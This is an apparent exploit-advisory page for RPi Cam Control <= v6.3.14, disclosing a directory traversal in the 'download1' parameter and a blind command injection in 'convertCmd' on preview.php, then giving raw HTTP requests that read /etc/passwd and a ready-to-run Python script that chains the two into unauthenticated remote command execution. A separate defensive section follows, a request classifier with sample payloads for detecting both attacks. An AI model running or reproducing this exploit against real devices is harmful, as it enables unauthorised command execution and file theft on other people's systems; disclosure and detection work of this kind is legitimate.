65 lines
No EOL
1.9 KiB
Python
Executable file
#!/usr/bin/python
#####
# RPi Cam Control <= v6.3.14 (RCE) preview.php Multiple Vulnerabilities
#
# A web interface for the RPi Cam
# Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
#
# Date 16/08/2017
# Discovered by @nopernik (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com
#
# RPi Cam Control <= v6.3.14 is vulnerable to Local File Read (directory traversal in the
# "download1" parameter of preview.php) and Blind Command Injection (the "convertCmd"
# parameter of preview.php reaches a shell, so $(...) is expanded and executed).
# Both requests are unauthenticated POSTs to preview.php.
#
#
# Local File Read (get /etc/passwd file):
# ----------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 80
#
# download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
#
#
# Blind Command Injection:
# ------------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 52
#
# convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
#
#
# The command injection is blind: nothing the command prints comes back in the HTTP
# response. The PoC below therefore redirects the command's output to /tmp/output.txt
# and reads that file back through the Local File Read, which turns the blind injection
# into command execution with visible output. The command runs with the privileges of the
# web server process, and /tmp/output.txt is left on the target afterwards.
#
# Proof of concept:
#####

import sys

import requests

if not len(sys.argv[2:]):
    print("Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'")
    sys.exit(1)


def GET(target, rfile):
    # Local File Read. The value is shaped like a thumbnail name (".v0000.t" suffix) so
    # preview.php accepts it, while the leading "../" sequences walk up to the
    # filesystem root; rfile is an absolute path on the target, e.g. /etc/passwd.
    res = requests.post("http://%s/preview.php" % target,
                        headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
                        data={"download1": "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)})
    return res.text


def RCE(target, command):
    # Blind Command Injection. convertCmd reaches a shell, so $(...) executes the
    # command; its stdout is redirected to /tmp/output.txt, which is then fetched
    # through the Local File Read above.
    requests.post("http://%s/preview.php" % target,
                  headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
                  data={"convert": "none", "convertCmd": "$(%s > /tmp/output.txt)" % command})
    return GET(target, '/tmp/output.txt')


target = sys.argv[1]
command = sys.argv[2]

print(RCE(target, command))
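The two requests above are easy to recognise once you can see the POST body. The following checker is an added example and is not part of the advisory or of the RPi_Cam_Web_Interface project: it classifies (path, body) pairs as the Local File Read pattern (traversal or absolute path in "download1") or the command injection pattern (shell metacharacters in "convertCmd"), percent-decoding up to three times so double-encoded variants do not slip past. It assumes request bodies are available to you, e.g. from a reverse proxy or WAF configured to log bodies or from a packet capture; a standard access log records only the request line. The sample requests are constructed, and the benign thumbnail filename is an assumption about what a legitimate value looks like.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample POST bodies (not captured traffic). The first two are the
# advisory's PoC requests; the rest are benign look-alikes and encoded variants.
# The benign thumbnail name is an assumption, not a value taken from the project.
SAMPLE_REQUESTS = [
    ("/preview.php", "download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t"),
    ("/preview.php", "convert=none&convertCmd=%24%28id%20%3E%20%2Ftmp%2Foutput.txt%29"),
    ("/preview.php", "download1=im_0001_20170816_120000.jpg.v0001.th.jpg"),
    ("/preview.php", "convert=none&convertCmd=ffmpeg"),
    ("/index.php", "download1=../../etc/passwd"),
    ("/preview.php", "download1=%252e%252e%2Fetc%2Fpasswd.v0000.t"),
    ("/preview.php", "convert=none&convertCmd=%60id%60"),
]

# "../" or "..\" at the start of the value or right after a path separator.
TRAVERSAL = re.compile(r"(^|[/\\])\.\.([/\\]|$)")
# Anything that lets a value escape a single shell word: $, backticks,
# command separators, pipes, redirects and newlines.
SHELL_META = re.compile(r"[$`;|&<>\n]")


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded) to catch double encoding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(path, body):
    """Return the set of findings for one POST request; empty if nothing matched."""
    findings = set()
    if not path.split("?", 1)[0].endswith("/preview.php"):
        return findings
    params = parse_qs(body, keep_blank_values=True)  # decodes one %xx layer itself
    for value in params.get("download1", []):
        value = fully_decode(value)
        if value.startswith("/") or TRAVERSAL.search(value):
            findings.add("local-file-read")
    for value in params.get("convertCmd", []):
        if SHELL_META.search(fully_decode(value)):
            findings.add("command-injection")
    return findings


def scan(requests_):
    """Run classify_request over (path, body) pairs and keep only the hits."""
    hits = []
    for path, body in requests_:
        findings = classify_request(path, body)
        if findings:
            hits.append((path, body, sorted(findings)))
    return hits


if __name__ == "__main__":
    for path, body, findings in scan(SAMPLE_REQUESTS):
        print("%s  %s  <- %s" % (", ".join(findings), path, body))
```

The repeated decoding deliberately over-reports: PHP decodes form bodies only once, so a double-encoded traversal would not actually be exploitable against this code, but a request shaped that way is still worth an alert. Matching on shell metacharacters rather than on the literal `$(` string is what catches the backtick variant in the last sample.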